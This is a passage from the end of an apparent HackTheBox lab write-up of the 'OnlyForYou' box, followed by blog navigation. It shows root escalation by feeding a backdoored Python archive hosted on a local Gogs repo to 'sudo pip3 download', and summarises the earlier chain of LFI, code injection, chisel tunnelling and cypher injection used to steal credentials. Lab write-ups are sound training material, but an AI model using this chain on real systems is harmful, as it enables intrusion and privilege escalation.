<p><img data-src="/assets/img/Pasted image 20230820065003.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230820062711.png" alt="" data-proofer-ignore></p>

<p>I then made the repo public;</p>

<p><img data-src="/assets/img/Pasted image 20230820062948.png" alt="" data-proofer-ignore></p>

<p>I then copied the raw URL, which is <code class="language-plaintext highlighter-rouge">http://127.0.0.1:3000/john/Test/raw/master/backdoored.tar.gz</code></p>

<p><img data-src="/assets/img/Pasted image 20230820062811.png" alt="" data-proofer-ignore></p>

<p>I then passed the link to <code class="language-plaintext highlighter-rouge">sudo pip3 download http://127.0.0.1:3000/john/Test/raw/master/backdoored.tar.gz</code>, which gave me a shell on the box as <code class="language-plaintext highlighter-rouge">root</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230820063920.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="summary">Summary<a href="#summary" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<ul>
  <li>NMAP showed port <strong>22</strong> and <strong>80</strong> listening.</li>
  <li>Analysed the source code for <code class="language-plaintext highlighter-rouge">beta.only4you.htb</code> to find an LFI</li>
  <li>Used it to dump the source of <code class="language-plaintext highlighter-rouge">only4you.htb</code> and identify a <em>code injection</em> vulnerability, which gave me a shell as <code class="language-plaintext highlighter-rouge">www-data</code></li>
  <li>Inside as <code class="language-plaintext highlighter-rouge">www-data</code>;
    <ul>
      <li>Setup a tunnel to local services using <code class="language-plaintext highlighter-rouge">chisel</code></li>
      <li>Found a <em>cypher injection</em> vulnerability on the service on port <code class="language-plaintext highlighter-rouge">8001</code></li>
      <li>Exploited it to get the creds of <code class="language-plaintext highlighter-rouge">john</code> for SSH and Gogs access</li>
    </ul>
  </li>
  <li>Inside as <code class="language-plaintext highlighter-rouge">john</code>;
    <ul>
      <li>Leveraged access to <em>Gogs</em> to exploit a <code class="language-plaintext highlighter-rouge">sudo</code> permission on <code class="language-plaintext highlighter-rouge">pip3 download</code> to download and execute a backdoored python archive as <code class="language-plaintext highlighter-rouge">root</code>.</li>
    </ul>
  </li>
</ul>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories --><div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i><a href='/categories/hackthebox/'>hackthebox</a></div><!-- tags --><div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i><a href="/tags/hackthebox/"
          class="post-tag no-text-decoration" >hackthebox</a><a href="/tags/medium/"
          class="post-tag no-text-decoration" >medium</a><a href="/tags/linux/"
          class="post-tag no-text-decoration" >linux</a><a href="/tags/lfi/"
          class="post-tag no-text-decoration" >lfi</a><a href="/tags/rce/"
          class="post-tag no-text-decoration" >rce</a><a href="/tags/nginx/"
          class="post-tag no-text-decoration" >nginx</a><a href="/tags/flask/"
          class="post-tag no-text-decoration" >flask</a><a href="/tags/chisel/"
          class="post-tag no-text-decoration" >chisel</a><a href="/tags/tunneling/"
          class="post-tag no-text-decoration" >tunneling</a><a href="/tags/neo4j/"
          class="post-tag no-text-decoration" >neo4j</a><a href="/tags/cypher-injection/"
          class="post-tag no-text-decoration" >cypher injection</a><a href="/tags/pip/"
          class="post-tag no-text-decoration" >pip</a></div><div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a> by the author.</div><!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons"><a href="https://twitter.com/intent/tweet?text=OnlyForYou - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/only4you.html" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a><a href="https://www.facebook.com/sharer/sharer.php?title=OnlyForYou - HackTheBox - 4g3nt47&u=https://4g3nt47.github.io/posts/hackthebox/only4you.html" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a><a href="https://telegram.me/share?text=OnlyForYou - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/only4you.html" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a><i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        title-succeed="Link copied successfully!">
    </i>

  </span>
</div>
</div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->

</div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

    <div class="access"><!--<div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/lfi/">lfi</a><a class="post-tag" href="/tags/rce/">rce</a></div>
  </div>-->
    </div><!-- BS-toc.js will be loaded at medium priority -->
<script src="/assets/js/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div></div>

</div>

<!-- tail --><div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  --><!-- An random integer that bigger than 0  --><!-- Equals to TAG_SCORE / {max_categories_hierarchy}  --><!-- Fill with the other newlest posts  --><div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4"><div class="card">
        <a href="/posts/hackthebox/agile.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2023-08-05 00:00:00 +0100">Aug  5</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Agile - HackTheBox</h3>
            <div class="text-muted small">
              <p>Agile is a medium linux box by 0xdf featuring a simple web-based LFI that could be used to bypass PIN validation in the Werkzeug debug console. Once on the box, you’ll recover some creds from a MyS...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/horizontall.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2022-02-05 00:00:00 +0100">Feb  5, 2022</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Horizontall - HackTheBox</h3>
            <div class="text-muted small">
              <p>Horizontall is an easy linux box featuring two RCEs. It has a web service that is generated using some imported JavaScript. Analysing the JavaScript code will lead you to a hidden subdomain, which ...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/redpanda.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2022-11-26 00:00:00 +0100">Nov 26, 2022</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>RedPanda - HackTheBox</h3>
            <div class="text-muted small">
              <p>RedPanda is a very easy linux box. It starts with a web service that’s vulnerable to Server-side Template Injection (SSTI) using Thymeleaf to gain RCE. Privesc involves exploiting two (2) path path...
              </p>
            </div>
          </div>
        </a>
      </div></div> <!-- .card-deck -->
  </div> <!-- #related-posts --><!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between"><a href="/posts/hackthebox/busqueda.html" class="btn btn-outline-primary"
    prompt="Older">
    <p>Busqueda - HackTheBox</p>
  </a><a href="/posts/hackthebox/monitorstwo.html" class="btn btn-outline-primary"
    prompt="Newer">
    <p>MonitorsTwo - HackTheBox</p>
  </a></div>
<!--  The comments switcher --></div>
  </div>
</div> <!-- .row --><!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2023
        <a href="https://twitter.com/UmarAbdoul">Umar Abdul</a>.<span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p>
    </div>

    <div class="footer-right">
      <p class="mb-0">Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>
</div><!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints"><div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/lfi/">lfi</a><a class="post-tag" href="/tags/rce/">rce</a></div>
  </div></div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>
</div> <!-- #main-wrapper --><div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a><!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
--><script src="/assets/js/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>
<!--
  JS selector for site.
-->

<!-- layout specified --><!-- image lazy-loading & popup -->
  <script src="/assets/js/clipboard.min.js"></script><script defer src="/assets/js/dist/post.min.js"></script><!-- commons -->

<script src="/assets/js/bootstrap.min.js"></script></body>

</html>
